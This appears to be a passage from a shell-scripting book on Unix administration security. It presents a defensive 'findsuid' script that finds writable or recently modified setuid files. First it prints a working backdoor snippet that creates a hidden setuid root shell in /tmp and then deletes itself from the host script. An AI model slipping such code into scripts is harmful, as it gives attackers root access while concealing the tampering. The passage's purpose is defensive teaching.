|
|
The most common use of shell scripts is to help with Unix or Linux system administration. There's an obvious reason for this, of course: Administrators are often the most knowledgeable Unix users on the system, and they also are responsible for ensuring that things run smoothly and without a glitch. But there might be an additional reason for the emphasis on shell scripts within the system administration world. My theory? That system administrators and other power users are the people most likely to be having fun with their system, and shell scripts are quite fun to develop within the Unix environment!
And with that, let's continue exploring how shell scripts can help you with system administration tasks.
There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.
In a shell script, for example, adding a few lines of code can create a setuid shell for the bad guy once the code is invoked by the unsuspecting root user:
if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME
cp /bin/sh /tmp/.rootshell # REMOVEME
chown root /tmp/.rootshell # REMOVEME
chmod -f 4777 /tmp/.rootshell # REMOVEME
grep -v "# REMOVEME" $0 > /tmp/junk # REMOVEME
mv /tmp/junk $0 # REMOVEME
fi # REMOVEME
Once this script is run by root, a shell is surreptitiously copied into /tmp as .rootshell and is made setuid root for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code (hence the # REMOVEME at the end of each line), leaving essentially no trace of what the cracker did.
The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of root; hence the critical need to ensure that you know and approve of all setuid root commands on your system. Of course, you should never have scripts with any sort of setuid or setgid permission for just this reason, but it's still smart to keep an eye on things.
#!/bin/sh
# findsuid - Checks all SUID files or programs to see if they're writeable,
# and outputs the matches in a friendly and useful format.
mtime="7" # how far back (in days) to check for modified cmds
verbose=0 # by default, let's be quiet about things
if [ "$1" = "-v" ] ; then
verbose=1
fi
for match in $(find / -type f -perm +4000 -print)
do
if [ -x $match ] ; then
owner="$(ls -ld $match | awk '{print $3}')"
perms="$(ls -ld $match | cut -c5-10 | grep 'w')"
if [ ! -z $perms ] ; then
echo "**** $match (writeable and setuid $owner)"
elif [ ! -z $(find $match -mtime -$mtime -print) ] ; then
echo "**** $match (modified within $mtime days and setuid $owner)"
elif [ $verbose -eq 1 ] ; then
lastmod="$(ls -ld $match | awk '{print $6, $7, $8}')"
echo " $match (setuid $owner, last modified $lastmod)"
fi
fi
done
exit 0
This script checks all setuid commands on the system to see if they're group-or world-writable and whether they've been modified in the last $mtime days.
This script has one optional argument: -v produces a verbose output that lists every setuid program encountered by the script. This script should probably be run as root, but it can be run as any user that has access permission to the key directories.
I've dropped a "hacked" script somewhere in the system. Let's see if findsuid can find it:
$ findsuid **** /var/tmp/.sneaky/editme (writeable and setuid root)
There it is!
$ ls -l /var/tmp/.sneaky/editme -rwsrwxrwx 1 root wheel 25988 Jul 13 11:50 /var/tmp/.sneaky/editme
A huge hole just waiting for someone to exploit.
|
|
| This HTML Help has been published using the chm2web software. |